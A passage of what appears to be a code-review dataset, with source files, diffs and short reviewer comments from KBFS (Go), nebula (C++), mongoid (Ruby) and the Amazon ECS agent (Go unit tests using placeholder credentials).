return NewMDServerMemory(mdServerLocalConfigAdapter{config})
}
if len(mdserverAddr) == 0 {
return nil, errors.New("Empty MD server address")
}
if serverRootDir, ok := parseRootDir(mdserverAddr); ok {
log.Debug("Using on-disk mdserver at %s", serverRootDir)
// local persistent MD server
mdPath := filepath.Join(serverRootDir, "kbfs_md")
return NewMDServerDir(mdServerLocalConfigAdapter{config}, mdPath)
}
remote, err := rpc.ParsePrioritizedRoundRobinRemote(mdserverAddr)
if err != nil {
return nil, err
}
// remote MD server. this can't fail. reconnection attempts
// will be automatic.
log.Debug("Using remote mdserver %s", remote)
mdServer := NewMDServerRemote(config, remote, rpcLogFactory)
return mdServer, nil
}
func makeKeyServer(config Config, keyserverAddr string,
log logger.Logger) (KeyServer, error) {
if keyserverAddr == memoryAddr {
log.Debug("Using in-memory keyserver")
// local in-memory key server
return NewKeyServerMemory(config)
}
if len(keyserverAddr) == 0 {
return nil, errors.New("Empty key server address")
}
if serverRootDir, ok := parseRootDir(keyserverAddr); ok {
log.Debug("Using on-disk keyserver at %s", serverRootDir)
// local persistent key server
keyPath := filepath.Join(serverRootDir, "kbfs_key")
return NewKeyServerDir(config, keyPath)
}
log.Debug("Using remote keyserver %s (same as mdserver)", keyserverAddr)
// currently the MD server also acts as the key server.
keyServer, ok := config.MDServer().(KeyServer)
if !ok {
return nil, errors.New("MD server is not a key server")
}
return keyServer, nil
}
func makeBlockServer(config Config, bserverAddr string,
rpcLogFactory rpc.LogFactory,
log logger.Logger) (BlockServer, error) {
if bserverAddr == memoryAddr {
log.Debug("Using in-memory bserver")
bserverLog := config.MakeLogger("BSM")
// local in-memory block server
return NewBlockServerMemory(bserverLog), nil
}
if len(bserverAddr) == 0 {
return nil, errors.New("Empty block server address")
}
if serverRootDir, ok := parseRootDir(bserverAddr); ok {
log.Debug("Using on-disk bserver at %s", serverRootDir)
// local persistent block server
blockPath := filepath.Join(serverRootDir, "kbfs_block")
bserverLog := config.MakeLogger("BSD")
return NewBlockServerDir(config.Codec(),
bserverLog, blockPath), nil
}
remote, err := rpc.ParsePrioritizedRoundRobinRemote(bserverAddr)
if err != nil {
return nil, err
}
log.Debug("Using remote bserver %s", remote)
return NewBlockServerRemote(config, remote, rpcLogFactory), nil
}
// InitLogWithPrefix sets up logging switching to a log file if
// necessary, given a prefix and a default log path. Returns a valid
// logger even on error, which are non-fatal, thus errors from this
// function may be ignored. Possible errors are logged to the logger
// returned.
func InitLogWithPrefix(
params InitParams, ctx Context, prefix string,
defaultLogPath string) (logger.Logger, error) {
var err error
// Set log file to default if log-to-file was specified
if params.LogToFile {
if params.LogFileConfig.Path != "" {
return nil, fmt.Errorf(
"log-to-file and log-file flags can't be specified together")
}
params.LogFileConfig.Path = defaultLogPath
}
if params.LogFileConfig.Path != "" {
err = logger.SetLogFileConfig(¶ms.LogFileConfig)
}
log := logger.NewWithCallDepth(prefix, 1)
log.Configure("", params.Debug, "")
log.Info("KBFS version %s", VersionString())
if err != nil {
log.Warning("Failed to setup log file %q: %+v",
params.LogFileConfig.Path, err)
}
return log, err
}
// InitLog sets up logging switching to a log file if necessary.
// Returns a valid logger even on error, which are non-fatal, thus
// errors from this function may be ignored.
// Possible errors are logged to the logger returned.
func InitLog(params InitParams, ctx Context) (logger.Logger, error) {
return InitLogWithPrefix(params, ctx, "kbfs", defaultLogPath(ctx))
}
// InitWithLogPrefix initializes a config and returns it, given a prefix.
//
// onInterruptFn is called whenever an interrupt signal is received
// (e.g., if the user hits Ctrl-C).
//
// Init should be called at the beginning of main. Shutdown (see
// below) should then be called at the end of main (usually via
// defer).
//
// The keybaseServiceCn argument is to specify a custom service and
// crypto (for non-RPC environments) like mobile. If this is nil, we'll
// use the default RPC implementation.
func InitWithLogPrefix(
ctx context.Context, kbCtx Context, params InitParams,
keybaseServiceCn KeybaseServiceCn, onInterruptFn func(),
log logger.Logger, logPrefix string) (cfg Config, err error) {
done := make(chan struct{})
interruptChan := make(chan os.Signal, 1)
signal.Notify(interruptChan, os.Interrupt)
go func() {
_ = <-interruptChan
close(done)
if onInterruptFn != nil {
onInterruptFn()
// Unmount can fail if there are open file handles. In
// this case, the files need to be closed before calling
// unmount again. We keep listening on the signal channel
// in case unmount fails the first time, so user can press
// Ctrl-C again after closing open files.
//
// Not closing the channel here because we need to keep it
// open to handle further incoming signals. We don't
// explicitly call os.Exit here so that the process exits
// through normal workflow as a result of Ctrl-C. If the
// process needs to exit immediately no matter unmount
// succeeds or not, a different interrupt (e.g. SIGTERM)
// can be used to skip this.
for range interruptChan {
onInterruptFn()
}
}
}()
// Spawn a new goroutine for `doInit` so that we can `select` on
// `done` and `errCh` below. This is particularly for the
// situation where a SIGINT comes in while `doInit` is still not
// finished (because e.g. service daemon is not up), where the
// process can fail to exit while being stuck in `doInit`. This
// allows us to not call `os.Exit()` in the interrupt handler.
errCh := make(chan error)
go func() {
var er error
cfg, er = doInit(ctx, kbCtx, params, keybaseServiceCn, log, logPrefix)
errCh <- er
}()
select {
case <-done:
return nil, errors.New(os.Interrupt.String())
case err = <-errCh:
return cfg, err
}
}
// Init initializes a config and returns it.
//
// onInterruptFn is called whenever an interrupt signal is received
// (e.g., if the user hits Ctrl-C).
//
// Init should be called at the beginning of main. Shutdown (see
// below) should then be called at the end of main (usually via
// defer).
//
// The keybaseServiceCn argument is to specify a custom service and
// crypto (for non-RPC environments) like mobile. If this is nil, we'll
// use the default RPC implementation.
func Init(
ctx context.Context, kbCtx Context, params InitParams,
keybaseServiceCn KeybaseServiceCn, onInterruptFn func(),
log logger.Logger) (cfg Config, err error) {
return InitWithLogPrefix(
ctx, kbCtx, params, keybaseServiceCn, onInterruptFn, log, "kbfs")
}
func doInit(
ctx context.Context, kbCtx Context, params InitParams,
keybaseServiceCn KeybaseServiceCn, log logger.Logger,
logPrefix string) (Config, error) {
mode := InitDefault
switch params.Mode {
case InitDefaultString:
log.CDebugf(ctx, "Initializing in default mode")
// Already the default
case InitMinimalString:
log.CDebugf(ctx, "Initializing in minimal mode")
mode = InitMinimal
case InitSingleOpString:
log.CDebugf(ctx, "Initializing in singleOp mode")
mode = InitSingleOp
default:
return nil, fmt.Errorf("Unexpected mode: %s", params.Mode)
}
config := NewConfigLocal(mode, func(module string) logger.Logger {
mname := logPrefix
if module != "" {
mname += fmt.Sprintf("(%s)", module)
}
// Add log depth so that context-based messages get the right
// file printed out.
lg := logger.NewWithCallDepth(mname, 1)
if params.Debug {
// Turn on debugging. TODO: allow a proper log file and
// style to be specified.
lg.Configure("", true, "")
}
return lg
}, params.StorageRoot, params.DiskCacheMode, kbCtx)
if params.CleanBlockCacheCapacity > 0 {
log.CDebugf(
ctx, "overriding default clean block cache capacity from %d to %d",
config.BlockCache().GetCleanBytesCapacity(),
params.CleanBlockCacheCapacity)
config.BlockCache().SetCleanBytesCapacity(
params.CleanBlockCacheCapacity)
}
workers := defaultBlockRetrievalWorkerQueueSize
prefetchWorkers := defaultPrefetchWorkerQueueSize
if config.Mode() == InitMinimal {
// In minimal mode, a few workers are still needed to fetch
// unembedded block changes in the MD updates, but not many.
// TODO: turn off the block retriever entirely as part of
// KBFS-2026, when block re-embedding is no longer required.
workers = minimalBlockRetrievalWorkerQueueSize
prefetchWorkers = minimalPrefetchWorkerQueueSize
}
config.SetBlockOps(NewBlockOpsStandard(config, workers, prefetchWorkers))
bsplitter, err := NewBlockSplitterSimple(MaxBlockSizeBytesDefault, 8*1024,
config.Codec())
if err != nil {
return nil, err
}
config.SetBlockSplitter(bsplitter)
if registry := config.MetricsRegistry(); registry != nil {
keyCache := config.KeyCache()
keyCache = NewKeyCacheMeasured(keyCache, registry)
config.SetKeyCache(keyCache)
keyBundleCache := config.KeyBundleCache()
keyBundleCache = NewKeyBundleCacheMeasured(keyBundleCache, registry)
config.SetKeyBundleCache(keyBundleCache)
}
config.SetMetadataVersion(kbfsmd.MetadataVer(params.MetadataVersion))
config.SetTLFValidDuration(params.TLFValidDuration)
config.SetBGFlushPeriod(params.BGFlushPeriod)
kbfsOps := NewKBFSOpsStandard(config)
config.SetKBFSOps(kbfsOps)
config.SetNotifier(kbfsOps)
config.SetKeyManager(NewKeyManagerStandard(config))
config.SetMDOps(NewMDOpsStandard(config))
kbfsLog := config.MakeLogger("")
// Initialize Keybase service connection
if keybaseServiceCn == nil {
keybaseServiceCn = keybaseDaemon{}
}
service, err := keybaseServiceCn.NewKeybaseService(
config, params, kbCtx, kbfsLog)
if err != nil {
return nil, fmt.Errorf("problem creating service: %s", err)
}
if registry := config.MetricsRegistry(); registry != nil {
service = NewKeybaseServiceMeasured(service, registry)
}
config.SetKeybaseService(service)
// Initialize KBPKI client (needed for MD Server).
k := NewKBPKIClient(config, kbfsLog)
config.SetKBPKI(k)
config.SetReporter(NewReporterKBPKI(config, 10, 1000))
// Initialize Crypto client (needed for MD and Block servers).
crypto, err := keybaseServiceCn.NewCrypto(config, params, kbCtx, kbfsLog)
if err != nil {
return nil, fmt.Errorf("problem creating crypto: %s", err)
}
config.SetCrypto(crypto)
// Initialize MDServer connection.
mdServer, err := makeMDServer(
config, params.MDServerAddr, kbCtx.NewRPCLogFactory(), log)
if err != nil {
return nil, fmt.Errorf("problem creating MD server: %+v", err)
}
config.SetMDServer(mdServer)
// Initialize KeyServer connection. MDServer is the KeyServer at the
// moment.
keyServer, err := makeKeyServer(config, params.MDServerAddr, log)
if err != nil {
return nil, fmt.Errorf("problem creating key server: %+v", err)
}
if registry := config.MetricsRegistry(); registry != nil {
keyServer = NewKeyServerMeasured(keyServer, registry)
}
config.SetKeyServer(keyServer)
// Initialize BlockServer connection.
bserv, err := makeBlockServer(
config, params.BServerAddr, kbCtx.NewRPCLogFactory(), log)
if err != nil {
return nil, fmt.Errorf("cannot open block database: %+v", err)
}
if registry := config.MetricsRegistry(); registry != nil {
bserv = NewBlockServerMeasured(bserv, registry)
}
config.SetBlockServer(bserv)
err = config.MakeDiskBlockCacheIfNotExists()
if err != nil {
log.CWarningf(ctx, "Could not initialize disk cache: %+v", err)
notification := &keybase1.FSNotification{
StatusCode: keybase1.FSStatusCode_ERROR,
NotificationType: keybase1.FSNotificationType_INITIALIZED,
ErrorType: keybase1.FSErrorType_DISK_CACHE_ERROR_LOG_SEND,
}
defer config.Reporter().Notify(ctx, notification)
} else {
log.CDebugf(ctx, "Disk cache of type \"%s\" enabled",
params.DiskCacheMode.String())
}
if config.Mode() == InitDefault {
// Initialize kbfsService only when we run a full KBFS process.
// This requires the disk block cache to have been initialized, if it
// should be initialized.
kbfsService, err := NewKBFSService(kbCtx, config)
if err != nil {
// This error shouldn't be fatal
log.CWarningf(ctx, "Error starting RPC server for KBFS: %+v", err)
} else {
config.SetKBFSService(kbfsService)
log.CDebugf(ctx, "Started RPC server for KBFS")
}
}
err = config.EnableDiskLimiter(params.StorageRoot)
if err != nil {
log.CWarningf(ctx, "Could not enable disk limiter: %+v", err)
return nil, err
}
ctx10s, cancel := context.WithTimeout(ctx, 10*time.Second)
defer cancel()
// TODO: Don't turn on journaling if either -bserver or
// -mdserver point to local implementations.
if params.EnableJournal && config.Mode() != InitMinimal {
journalRoot := filepath.Join(params.StorageRoot, "kbfs_journal")
err = config.EnableJournaling(ctx10s, journalRoot,
params.TLFJournalBackgroundWorkStatus)
if err != nil {
log.CWarningf(ctx, "Could not initialize journal server: %+v", err)
}
log.CDebugf(ctx, "Journaling enabled")
}
if params.BGFlushDirOpBatchSize < 1 {
return nil, fmt.Errorf(
"Illegal sync batch size: %d", params.BGFlushDirOpBatchSize)
}
log.CDebugf(ctx, "Enabling a dir op batch size of %d",
params.BGFlushDirOpBatchSize)
config.SetBGFlushDirOpBatchSize(params.BGFlushDirOpBatchSize)
return config, nil
}
// Shutdown does any necessary shutdown tasks for libkbfs. Shutdown
// should be called at the end of main.
func Shutdown() {}
| 1 | 18,499 | Would a KBFS_DISABLE_JOURNAL make more sense? | keybase-kbfs | go |
@@ -40,6 +40,8 @@ void DropSpaceExecutor::execute() {
if (*spaceName_ == ectx()->rctx()->session()->spaceName()) {
ectx()->rctx()->session()->setSpace("", -1);
}
+ ectx()->addWarningMsg("Data will be deleted completely after restarting the services");
+
doFinish(Executor::ProcessControl::kNext);
};
| 1 | /* Copyright (c) 2018 vesoft inc. All rights reserved.
*
* This source code is licensed under Apache 2.0 License,
* attached with Common Clause Condition 1.0, found in the LICENSES directory.
*/
#include "graph/DropSpaceExecutor.h"
namespace nebula {
namespace graph {
DropSpaceExecutor::DropSpaceExecutor(Sentence *sentence,
ExecutionContext *ectx)
: Executor(ectx, "drop_space") {
sentence_ = static_cast<DropSpaceSentence*>(sentence);
}
Status DropSpaceExecutor::prepare() {
spaceName_ = sentence_->spaceName();
return Status::OK();
}
void DropSpaceExecutor::execute() {
auto future = ectx()->getMetaClient()->dropSpace(*spaceName_, sentence_->isIfExists());
auto *runner = ectx()->rctx()->runner();
auto cb = [this] (auto &&resp) {
if (!resp.ok()) {
doError(std::move(resp).status());
return;
}
auto ret = std::move(resp).value();
if (!ret) {
doError(Status::Error("Drop space `%s' failed.", spaceName_->c_str()));
return;
}
if (*spaceName_ == ectx()->rctx()->session()->spaceName()) {
ectx()->rctx()->session()->setSpace("", -1);
}
doFinish(Executor::ProcessControl::kNext);
};
auto error = [this] (auto &&e) {
auto msg = folly::stringPrintf("Drop space `%s' exception: %s",
spaceName_->c_str(), e.what().c_str());
LOG(ERROR) << msg;
doError(Status::Error(std::move(msg)));
return;
};
std::move(future).via(runner).thenValue(cb).thenError(error);
}
void DropSpaceExecutor::setupResponse(cpp2::ExecutionResponse &resp) {
resp.set_warning_msg("Data will be deleted completely after restarting the services.");
}
} // namespace graph
} // namespace nebula
| 1 | 29,850 | BTW. What's the message meaning?... | vesoft-inc-nebula | cpp |
@@ -289,4 +289,15 @@ describe Mongoid::Extensions::Object do
end
end
end
+
+ describe "#numeric?" do
+
+ let(:object) do
+ Object.new
+ end
+
+ it "returns false" do
+ expect(object.numeric?).to eq(false)
+ end
+ end
end | 1 | require "spec_helper"
describe Mongoid::Extensions::Object do
describe "#__evolve_object_id__" do
let(:object) do
Object.new
end
it "returns self" do
expect(object.__evolve_object_id__).to eq(object)
end
end
describe "#__find_args__" do
let(:object) do
Object.new
end
it "returns self" do
expect(object.__find_args__).to eq(object)
end
end
describe "#__mongoize_object_id__" do
let(:object) do
Object.new
end
it "returns self" do
expect(object.__mongoize_object_id__).to eq(object)
end
end
describe ".__mongoize_fk__" do
context "when the related model uses object ids" do
let(:metadata) do
Game.relations["person"]
end
let(:constraint) do
metadata.constraint
end
context "when provided an object id" do
let(:object_id) do
BSON::ObjectId.new
end
let(:fk) do
Object.__mongoize_fk__(constraint, object_id)
end
it "returns the object id" do
expect(fk).to eq(object_id)
end
end
context "when provided a string" do
context "when the string is a legal object id" do
let(:object_id) do
BSON::ObjectId.new
end
let(:fk) do
Object.__mongoize_fk__(constraint, object_id.to_s)
end
it "returns the object id" do
expect(fk).to eq(object_id)
end
end
context "when the string is not a legal object id" do
let(:string) do
"blah"
end
let(:fk) do
Object.__mongoize_fk__(constraint, string)
end
it "returns the string" do
expect(fk).to eq(string)
end
end
context "when the string is blank" do
let(:fk) do
Object.__mongoize_fk__(constraint, "")
end
it "returns nil" do
expect(fk).to be_nil
end
end
end
context "when provided nil" do
let(:fk) do
Object.__mongoize_fk__(constraint, nil)
end
it "returns nil" do
expect(fk).to be_nil
end
end
context "when provided an empty array" do
let(:fk) do
Object.__mongoize_fk__(constraint, [])
end
it "returns an empty array" do
expect(fk).to eq([])
end
end
end
end
describe "#__mongoize_time__" do
let(:object) do
Object.new
end
it "returns self" do
expect(object.__mongoize_time__).to eq(object)
end
end
describe "#__sortable__" do
let(:object) do
Object.new
end
it "returns self" do
expect(object.__sortable__).to eq(object)
end
end
describe ".demongoize" do
let(:object) do
"testing"
end
it "returns the provided object" do
expect(Object.demongoize(object)).to eq(object)
end
end
describe "#do_or_do_not" do
context "when the object is nil" do
let(:result) do
nil.do_or_do_not(:not_a_method, "The force is strong with you")
end
it "returns nil" do
expect(result).to be_nil
end
end
context "when the object is not nil" do
context "when the object responds to the method" do
let(:result) do
[ "Yoda", "Luke" ].do_or_do_not(:join, ",")
end
it "returns the result of the method" do
expect(result).to eq("Yoda,Luke")
end
end
context "when the object does not respond to the method" do
let(:result) do
"Yoda".do_or_do_not(:use, "The Force", 1000)
end
it "returns the result of the method" do
expect(result).to be_nil
end
end
end
end
describe ".mongoize" do
let(:object) do
"testing"
end
it "returns the provided object" do
expect(Object.mongoize(object)).to eq(object)
end
end
describe "#mongoize" do
let(:object) do
"testing"
end
it "returns the object" do
expect(object.mongoize).to eq(object)
end
end
describe "#resizable?" do
it "returns false" do
expect(Object.new).to_not be_resizable
end
end
describe "#you_must" do
context "when the object is frozen" do
let(:person) do
Person.new.tap { |peep| peep.freeze }
end
let(:result) do
person.you_must(:aliases=, [])
end
it "returns nil" do
expect(result).to be_nil
end
end
end
describe "#remove_ivar" do
context "when the instance variable is defined" do
let(:document) do
Person.new
end
before do
document.instance_variable_set(:@_testing, "testing")
end
let!(:removal) do
document.remove_ivar("testing")
end
it "removes the instance variable" do
expect(document.instance_variable_defined?(:@_testing)).to be false
end
it "returns the value" do
expect(removal).to eq("testing")
end
end
context "when the instance variable is not defined" do
let(:document) do
Person.new
end
let!(:removal) do
document.remove_ivar("testing")
end
it "returns false" do
expect(removal).to be false
end
end
end
end
| 1 | 11,163 | this should say false | mongodb-mongoid | rb |
@@ -1,3 +1,4 @@
+//go:build unit
// +build unit
// Copyright Amazon.com Inc. or its affiliates. All Rights Reserved. | 1 | // +build unit
// Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License"). You may
// not use this file except in compliance with the License. A copy of the
// License is located at
//
// http://aws.amazon.com/apache2.0/
//
// or in the "license" file accompanying this file. This file is distributed
// on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
// express or implied. See the License for the specific language governing
// permissions and limitations under the License.
package acsclient
import (
"encoding/json"
"errors"
"io"
"net/http"
"net/http/httptest"
"testing"
"time"
"github.com/aws/amazon-ecs-agent/agent/acs/model/ecsacs"
"github.com/aws/amazon-ecs-agent/agent/config"
"github.com/aws/amazon-ecs-agent/agent/wsclient"
mock_wsconn "github.com/aws/amazon-ecs-agent/agent/wsclient/wsconn/mock"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/credentials"
"github.com/golang/mock/gomock"
"github.com/gorilla/websocket"
"github.com/stretchr/testify/assert"
)
const (
sampleCredentialsMessage = `
{
"type": "IAMRoleCredentialsMessage",
"message": {
"messageId": "123",
"clusterArn": "default",
"taskArn": "t1",
"roleCredentials": {
"credentialsId": "credsId",
"accessKeyId": "accessKeyId",
"expiration": "2016-03-25T06:17:19.318+0000",
"roleArn": "roleArn",
"secretAccessKey": "secretAccessKey",
"sessionToken": "token"
}
}
}
`
sampleAttachENIMessage = `
{
"type": "AttachTaskNetworkInterfacesMessage",
"message": {
"messageId": "123",
"clusterArn": "default",
"taskArn": "task",
"elasticNetworkInterfaces":[{
"attachmentArn": "attach_arn",
"ec2Id": "eni_id",
"ipv4Addresses":[{
"primary": true,
"privateAddress": "ipv4"
}],
"ipv6Addresses":[{
"address": "ipv6"
}],
"macAddress": "mac"
}]
}
}
`
sampleAttachInstanceENIMessage = `
{
"type": "AttachInstanceNetworkInterfacesMessage",
"message": {
"messageId": "123",
"clusterArn": "default",
"elasticNetworkInterfaces":[{
"attachmentArn": "attach_arn",
"ec2Id": "eni_id",
"ipv4Addresses":[{
"primary": true,
"privateAddress": "ipv4"
}],
"ipv6Addresses":[{
"address": "ipv6"
}],
"macAddress": "mac"
}]
}
}
`
)
const (
TestClusterArn = "arn:aws:ec2:123:container/cluster:123456"
TestInstanceArn = "arn:aws:ec2:123:container/containerInstance/12345678"
rwTimeout = time.Second
)
var testCreds = credentials.NewStaticCredentials("test-id", "test-secret", "test-token")
var testCfg = &config.Config{
AcceptInsecureCert: true,
AWSRegion: "us-east-1",
}
func TestMakeUnrecognizedRequest(t *testing.T) {
ctrl := gomock.NewController(t)
defer ctrl.Finish()
conn := mock_wsconn.NewMockWebsocketConn(ctrl)
conn.EXPECT().SetWriteDeadline(gomock.Any()).Return(nil)
conn.EXPECT().Close()
cs := testCS(conn)
defer cs.Close()
// 'testing.T' should not be a known type ;)
err := cs.MakeRequest(t)
if _, ok := err.(*wsclient.UnrecognizedWSRequestType); !ok {
t.Fatal("Expected unrecognized request type")
}
}
func TestWriteAckRequest(t *testing.T) {
ctrl := gomock.NewController(t)
defer ctrl.Finish()
conn := mock_wsconn.NewMockWebsocketConn(ctrl)
conn.EXPECT().SetWriteDeadline(gomock.Any()).Return(nil).Times(2)
conn.EXPECT().Close()
cs := testCS(conn)
defer cs.Close()
// capture bytes written
var writes []byte
conn.EXPECT().WriteMessage(gomock.Any(), gomock.Any()).Do(func(_ int, data []byte) {
writes = data
})
// send request
err := cs.MakeRequest(&ecsacs.AckRequest{})
assert.NoError(t, err)
// unmarshal bytes written to the socket
msg := &wsclient.RequestMessage{}
err = json.Unmarshal(writes, msg)
assert.NoError(t, err)
assert.Equal(t, "AckRequest", msg.Type)
}
func TestPayloadHandlerCalled(t *testing.T) {
ctrl := gomock.NewController(t)
defer ctrl.Finish()
conn := mock_wsconn.NewMockWebsocketConn(ctrl)
// Messages should be read from the connection at least once
conn.EXPECT().SetReadDeadline(gomock.Any()).Return(nil).MinTimes(1)
conn.EXPECT().ReadMessage().Return(websocket.TextMessage,
[]byte(`{"type":"PayloadMessage","message":{"tasks":[{"arn":"arn"}]}}`),
nil).MinTimes(1)
// Invoked when closing the connection
conn.EXPECT().SetWriteDeadline(gomock.Any()).Return(nil)
conn.EXPECT().Close()
cs := testCS(conn)
defer cs.Close()
messageChannel := make(chan *ecsacs.PayloadMessage)
reqHandler := func(payload *ecsacs.PayloadMessage) {
messageChannel <- payload
}
cs.AddRequestHandler(reqHandler)
go cs.Serve()
expectedMessage := &ecsacs.PayloadMessage{
Tasks: []*ecsacs.Task{{
Arn: aws.String("arn"),
}},
}
assert.Equal(t, expectedMessage, <-messageChannel)
}
func TestRefreshCredentialsHandlerCalled(t *testing.T) {
ctrl := gomock.NewController(t)
defer ctrl.Finish()
conn := mock_wsconn.NewMockWebsocketConn(ctrl)
// Messages should be read from the connection at least once
conn.EXPECT().SetReadDeadline(gomock.Any()).Return(nil).MinTimes(1)
conn.EXPECT().ReadMessage().Return(websocket.TextMessage,
[]byte(sampleCredentialsMessage), nil).MinTimes(1)
// Invoked when closing the connection
conn.EXPECT().SetWriteDeadline(gomock.Any()).Return(nil)
conn.EXPECT().Close()
cs := testCS(conn)
defer cs.Close()
messageChannel := make(chan *ecsacs.IAMRoleCredentialsMessage)
reqHandler := func(message *ecsacs.IAMRoleCredentialsMessage) {
messageChannel <- message
}
cs.AddRequestHandler(reqHandler)
go cs.Serve()
expectedMessage := &ecsacs.IAMRoleCredentialsMessage{
MessageId: aws.String("123"),
TaskArn: aws.String("t1"),
RoleCredentials: &ecsacs.IAMRoleCredentials{
CredentialsId: aws.String("credsId"),
AccessKeyId: aws.String("accessKeyId"),
Expiration: aws.String("2016-03-25T06:17:19.318+0000"),
RoleArn: aws.String("roleArn"),
SecretAccessKey: aws.String("secretAccessKey"),
SessionToken: aws.String("token"),
},
}
assert.Equal(t, <-messageChannel, expectedMessage)
}
func TestClosingConnection(t *testing.T) {
ctrl := gomock.NewController(t)
defer ctrl.Finish()
// Returning EOF tells the ClientServer that the connection is closed
conn := mock_wsconn.NewMockWebsocketConn(ctrl)
conn.EXPECT().SetReadDeadline(gomock.Any()).Return(nil)
conn.EXPECT().ReadMessage().Return(0, nil, io.EOF)
// SetWriteDeadline will be invoked once for WriteMessage() and
// once for Close()
conn.EXPECT().SetWriteDeadline(gomock.Any()).Return(nil).Times(2)
conn.EXPECT().WriteMessage(gomock.Any(), gomock.Any()).Return(io.EOF)
conn.EXPECT().Close()
cs := testCS(conn)
defer cs.Close()
serveErr := cs.Serve()
assert.Error(t, serveErr)
err := cs.MakeRequest(&ecsacs.AckRequest{})
assert.Error(t, err)
}
func TestConnect(t *testing.T) {
closeWS := make(chan bool)
server, serverChan, requestChan, serverErr, err := startMockAcsServer(t, closeWS)
defer server.Close()
if err != nil {
t.Fatal(err)
}
go func() {
t.Fatal(<-serverErr)
}()
cs := New(server.URL, testCfg, testCreds, rwTimeout)
// Wait for up to a second for the mock server to launch
for i := 0; i < 100; i++ {
err = cs.Connect()
if err == nil {
break
}
time.Sleep(10 * time.Millisecond)
}
if err != nil {
t.Fatal(err)
}
errs := make(chan error)
cs.AddRequestHandler(func(msg *ecsacs.PayloadMessage) {
if *msg.MessageId != "messageId" || len(msg.Tasks) != 1 || *msg.Tasks[0].Arn != "arn1" {
errs <- errors.New("incorrect payloadMessage arguments")
} else {
errs <- nil
}
})
go func() {
_ = cs.Serve()
}()
go func() {
serverChan <- `{"type":"PayloadMessage","message":{"tasks":[{"arn":"arn1","desiredStatus":"RUNNING","overrides":"{}","family":"test","version":"v1","containers":[{"name":"c1","image":"redis","command":["arg1","arg2"],"cpu":10,"memory":20,"links":["db"],"portMappings":[{"containerPort":22,"hostPort":22}],"essential":true,"entryPoint":["bash"],"environment":{"key":"val"},"overrides":"{}","desiredStatus":"RUNNING"}]}],"messageId":"messageId"}}` + "\n"
}()
// Error for handling a 'PayloadMessage' request
err = <-errs
if err != nil {
t.Fatal(err)
}
mid := "messageId"
cluster := TestClusterArn
ci := TestInstanceArn
go func() {
cs.MakeRequest(&ecsacs.AckRequest{
MessageId: &mid,
Cluster: &cluster,
ContainerInstance: &ci,
})
}()
request := <-requestChan
// A request should have a 'type' and a 'message'
intermediate := struct {
Type string `json:"type"`
Message *ecsacs.AckRequest `json:"message"`
}{}
err = json.Unmarshal([]byte(request), &intermediate)
if err != nil {
t.Fatal(err)
}
if intermediate.Type != "AckRequest" || *intermediate.Message.MessageId != mid || *intermediate.Message.ContainerInstance != ci || *intermediate.Message.Cluster != cluster {
t.Fatal("Unexpected request")
}
closeWS <- true
close(serverChan)
}
func TestConnectClientError(t *testing.T) {
testServer := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(400)
w.Write([]byte(`{"InvalidClusterException":"Invalid cluster"}` + "\n"))
}))
defer testServer.Close()
cs := New(testServer.URL, testCfg, testCreds, rwTimeout)
err := cs.Connect()
_, ok := err.(*wsclient.WSError)
assert.True(t, ok, "Connect error expected to be a WSError type")
assert.EqualError(t, err, "InvalidClusterException: Invalid cluster")
}
func testCS(conn *mock_wsconn.MockWebsocketConn) wsclient.ClientServer {
foo := New("localhost:443", testCfg, testCreds, rwTimeout)
cs := foo.(*clientServer)
cs.SetConnection(conn)
return cs
}
// TODO: replace with gomock
func startMockAcsServer(t *testing.T, closeWS <-chan bool) (*httptest.Server, chan<- string, <-chan string, <-chan error, error) {
serverChan := make(chan string)
requestsChan := make(chan string)
errChan := make(chan error)
upgrader := websocket.Upgrader{ReadBufferSize: 1024, WriteBufferSize: 1024}
handler := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
ws, err := upgrader.Upgrade(w, r, nil)
go func() {
<-closeWS
ws.Close()
}()
if err != nil {
errChan <- err
}
go func() {
_, msg, err := ws.ReadMessage()
if err != nil {
errChan <- err
} else {
requestsChan <- string(msg)
}
}()
for str := range serverChan {
err := ws.WriteMessage(websocket.TextMessage, []byte(str))
if err != nil {
errChan <- err
}
}
})
server := httptest.NewTLSServer(handler)
return server, serverChan, requestsChan, errChan, nil
}
func TestAttachENIHandlerCalled(t *testing.T) {
ctrl := gomock.NewController(t)
defer ctrl.Finish()
conn := mock_wsconn.NewMockWebsocketConn(ctrl)
cs := testCS(conn)
defer cs.Close()
// Messages should be read from the connection at least once
conn.EXPECT().SetReadDeadline(gomock.Any()).Return(nil).MinTimes(1)
conn.EXPECT().ReadMessage().Return(websocket.TextMessage,
[]byte(sampleAttachENIMessage), nil).MinTimes(1)
// Invoked when closing the connection
conn.EXPECT().SetWriteDeadline(gomock.Any()).Return(nil)
conn.EXPECT().Close()
messageChannel := make(chan *ecsacs.AttachTaskNetworkInterfacesMessage)
reqHandler := func(message *ecsacs.AttachTaskNetworkInterfacesMessage) {
messageChannel <- message
}
cs.AddRequestHandler(reqHandler)
go cs.Serve()
expectedMessage := &ecsacs.AttachTaskNetworkInterfacesMessage{
MessageId: aws.String("123"),
ClusterArn: aws.String("default"),
TaskArn: aws.String("task"),
ElasticNetworkInterfaces: []*ecsacs.ElasticNetworkInterface{
{AttachmentArn: aws.String("attach_arn"),
Ec2Id: aws.String("eni_id"),
Ipv4Addresses: []*ecsacs.IPv4AddressAssignment{
{
Primary: aws.Bool(true),
PrivateAddress: aws.String("ipv4"),
},
},
Ipv6Addresses: []*ecsacs.IPv6AddressAssignment{
{
Address: aws.String("ipv6"),
},
},
MacAddress: aws.String("mac"),
},
},
}
assert.Equal(t, <-messageChannel, expectedMessage)
}
func TestAttachInstanceENIHandlerCalled(t *testing.T) {
ctrl := gomock.NewController(t)
defer ctrl.Finish()
conn := mock_wsconn.NewMockWebsocketConn(ctrl)
cs := testCS(conn)
defer cs.Close()
// Messages should be read from the connection at least once
conn.EXPECT().SetReadDeadline(gomock.Any()).Return(nil).MinTimes(1)
conn.EXPECT().ReadMessage().Return(websocket.TextMessage,
[]byte(sampleAttachInstanceENIMessage), nil).MinTimes(1)
// Invoked when closing the connection
conn.EXPECT().SetWriteDeadline(gomock.Any()).Return(nil)
conn.EXPECT().Close()
messageChannel := make(chan *ecsacs.AttachInstanceNetworkInterfacesMessage)
